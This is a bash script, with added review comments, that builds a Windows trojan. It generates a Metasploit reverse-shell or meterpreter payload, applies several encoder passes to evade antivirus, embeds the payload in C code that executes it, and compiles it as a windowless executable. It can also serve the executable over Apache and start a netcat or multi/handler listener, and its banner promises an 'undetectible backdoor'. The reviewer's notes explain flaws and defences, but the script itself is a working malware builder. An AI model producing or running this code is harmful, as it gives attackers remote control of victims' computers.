# Interactive wrapper that builds a Windows reverse-connect executable from
# Metasploit payloads. This first section prints a banner and decides the
# callback address (lhost) that is later baked into the payload.
# NOTE(review): no shebang is visible here, yet `[ ... == ... ]`, `echo -n`
# and `$"..."` below are bash features; presumably run with bash as root on a
# BackTrack-style layout (/pentest/..., /root/Desktop) - confirm.
clear
# NOTE(review): this cd is unchecked; if the directory is missing, every
# relative path below resolves against the caller's working directory.
cd /pentest/exploits/framework3
echo "*************************************"
echo " 0         0     0    0   0    0   0 "
echo " 0         0     0     0 0      0 0  "
echo " 0         0000000      0        0   "
echo " 0         0     0      0       0 0  "
echo " 000000    0     0      0      0   0 "
echo "*************************************"
echo "  creating an undetectible backdoor  "
echo "*************************************"
echo -n 'lhost ("e" for external IP) ?'
# The answer is either a literal address or "e"; it is never validated.
read host
if [ "$host" == "e" ]; then
# "e": derive the public address by scraping a third-party web page.
# NOTE(review): the scratch files below have fixed names in world-writable
# /tmp and are written with `>>` (append). A pre-existing ip*.txt changes the
# result, and a pre-existing index.html makes wget save under another name so
# the stale copy is parsed instead. Run as root, predictable names here are
# also a symlink hazard.
cd /tmp
# NOTE(review): plain-HTTP fetch with no integrity check; whatever the
# response contains ends up unvalidated in $lhost and is later expanded
# unquoted on command lines.
wget http://www.watismijnip.be/ 
cd /tmp
# Keep only the line carrying the address, then trim it down in stages:
# take the text after the first ':', cut at the first 'Y', remove all spaces,
# and drop the final character.
cat index.html | grep "Your IP address is" >> ip.txt
cat ip.txt | cut -d\: -f2 >> ip2.txt
cat ip2.txt | cut -d\Y -f1 >> ip3.txt
sed -i "s/ *//g" ip3.txt
cat ip3.txt | sed s/.$// >> ip4.txt
rm ip.txt
rm ip2.txt
rm ip3.txt
# $"..." is bash's locale-translation quoting; with no message catalog it
# behaves like a plain double-quoted string.
ip=$(cat  $"ip4.txt")
rm ip4.txt
rm index.html
lhost=$ip
echo "*************************************"
# $lhost is expanded outside the quotes here, so it is word-split and globbed.
echo "  External IP: "$lhost
echo "*************************************"
# Any answer other than "e" is used verbatim as the callback address.
else lhost=$host
fi
# Collect the remaining parameters and generate the encoded payload as C
# source (payload.c) inside the framework directory.
# NOTE(review): msfpayload, msfencode and msfcli are legacy Metasploit
# front-ends that current releases no longer ship, so this documents a
# historical workflow.
cd /pentest/exploits/framework3
echo -n "lport?"
# None of the three answers below is validated; $lport and $filename are
# later expanded unquoted in commands and file paths.
read lport 
echo -n "filename ?"
read filename
echo -n "meterpreter or reverse shell (m/rs) ?"
read kind
echo "Creating payload..."
# NOTE(review): if $kind is neither "rs" nor "m", no payload.c is produced and
# the later sed/compile steps run against missing files without stopping.
if [ "$kind" == "rs" ]; then
echo -n "Start netcat listener afterwards (y/n) ?"
read reverse
# Raw reverse-shell payload -> 10 passes of x86/shikata_ga_nai -> 2 passes of
# x86/countdown, written out in C format.
# NOTE(review): stacked encoder passes only change the bytes on disk, not what
# the code does once it runs; the banner's "undetectible" is the author's
# claim, not something this script demonstrates.
./msfpayload windows/shell_reverse_tcp LHOST=$lhost LPORT=$lport R | ./msfencode -e x86/shikata_ga_nai -c 10 -t raw | ./msfencode -e x86/countdown -c 2 -o payload.c c
fi
if [ "$kind" == "m" ]; then
echo -n "Start multi/handler afterwards (y/n) ?"
read multi
# Same encoder chain as above, applied to the staged meterpreter payload.
./msfpayload windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport R | ./msfencode -e x86/shikata_ga_nai -c 10 -t raw | ./msfencode -e x86/countdown -c 2 -o payload.c c
fi
# Post-process the encoder's C output so it can be spliced into another file.
# Step 1 removes the first '+' on each line; step 2 drops the first line.
# NOTE(review): presumably this strips the encoder's own array declaration so
# that only the string literal remains - confirm against real encoder output.
# Neither sed is checked, so a missing payload.c goes unnoticed here.
sed 's/+//' payload.c > payload2.c
rm payload.c
sed 1d payload2.c > payload3.c
rm payload2.c
echo "Preparing payload..."
# Load the remaining text into a shell variable; $"..." behaves like a plain
# double-quoted string when no message catalog is in use.
payload=$(cat  $"payload3.c")
# Start writing the C wrapper (trojan.c) in the current directory.
# NOTE(review): every write uses `>>` (append), so a trojan.c left behind by
# an aborted run is kept and the new text is added after it.
echo "Creating trojan..."
echo "#include <stdio.h>" >> trojan.c
echo "#include <stdlib.h>" >> trojan.c
echo "#include <string.h>" >> trojan.c
echo "#include <winsock2.h>" >> trojan.c
# These bare echo "" calls have no redirection, so they print blank lines to
# the terminal rather than into trojan.c.
echo ""
echo ""
echo ""
# Embed the encoded bytes as a global char array. The variable already holds
# the literal taken from the encoder output; it is pasted in unvalidated.
echo "char payload[] = $payload;" >> trojan.c
echo ""
echo 'char comment[] = "THIS IS A COMMENT :Dcbcbcizsqviqvciqviqvcqivyuivbqdsivcbsqiufvquiqvdfihqzvuyfvzfyvzequyvzhfezuvfuyvyvfyvyvfyzvzuyvzuvzuyvzyzvfzyfvezevfiufvzyfvziyvzfzvfzvfvfqvfqfvzyqfvyzqvfzyfvyuzvfuezvfuyvfzuyfvzuivfzvyfyvuyrvfhesfbiujiubfiubfreyzfvfyrefuevfydzbdzdhziudhizuhdziuhdizuhezuiziuyzgfuyevzyfvzyfzivfuzyvfuzvfzuyvfuzyvfuzyvfuyefvzuyvzuvuvzuyfvuvzuhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiisbviubvuibdsivbsvsskdqojdsoijdiozjdiozndbqibfcsvsdddyhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhuhgfzsfbkjbhjksbcbscnsopsjionhjoiehozibfoiuzehzujbfjkbsjkb sjbskjbskjbsubfsbizubeizbiu";' >> trojan.c
# Emit main(), cross-compile the wrapper for Windows, and clean up.
# The comment[] array written just before this point is never referenced by
# the generated main(); presumably filler - TODO confirm.
echo ""
# The generated main() takes six extra int parameters and declares three
# locals that are never used. The only statement with an effect is the cast
# of the payload array to a function pointer followed by a call through it.
# NOTE(review): that call executes bytes held in a data array, so it depends
# on the data being executable at run time; DEP/NX enforcement on the target
# is the relevant control.
echo "int main(int argc, char **argv, int a, int b, int c,int d, int e, int f) {" >> trojan.c
echo '	char DERPDERP[544];' >> trojan.c
echo '	char CapitalofBelgium[]= "BRUSSELS";' >> trojan.c
echo '	char *herpaderp[98765];' >> trojan.c
echo '	(*(void (*)()) payload)();' >> trojan.c
echo '	return(0);' >> trojan.c
echo "}" >> trojan.c
echo "Compiling trojan..."
# MinGW cross-compile; -mwindows selects the GUI subsystem, so the program
# opens no console window. With no -o given, the output file is a.exe.
# NOTE(review): the compiler's exit status is not checked; on failure the mv
# fails too, yet the script still prints "Trojan created !".
i586-mingw32msvc-gcc -mwindows trojan.c 
# $filename comes straight from the prompt; a value containing '/' or '..'
# would move the binary outside /root/Desktop.
mv a.exe "/root/Desktop/$filename.exe"
echo "Cleaning up..."
rm payload3.c
rm trojan.c
echo "*************************************"
echo "Trojan created !"
echo "Location: /root/Desktop/"$filename".exe"
echo "*************************************"
# Optional follow-up actions: publish the binary through the local Apache
# docroot and start whichever listener was requested earlier.
echo -n "Upload to http server (y/n) ?"
read http
if [ "$http" == "y" ]; then
echo "Uploading ..."
cd /root/Desktop
# NOTE(review): $filename is unquoted and unvalidated, so spaces or path
# separators change what gets copied and where. Once it is in /var/www the
# file is served to anyone who can reach this host's web server.
cp $filename.exe /var/www/$filename.exe
echo "Starting HTTP server..."
# Starts the system-wide Apache service and waits four seconds; the service
# is left running when the script ends.
sh -c "service apache2 start; sleep 4"
fi
# $multi is only set when the meterpreter branch ran and $reverse only when
# the reverse-shell branch ran; the quoted tests keep an unset value harmless.
if [ "$multi" == "y" ]; then
cd /pentest/exploits/framework3
# Foreground handler matching the meterpreter payload generated earlier.
./msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport E
fi
if [ "$reverse" == "y" ]; then
# Plain netcat listener on the chosen port; blocks until it exits.
nc -lvp $lport
fi
echo "Done !"
exit

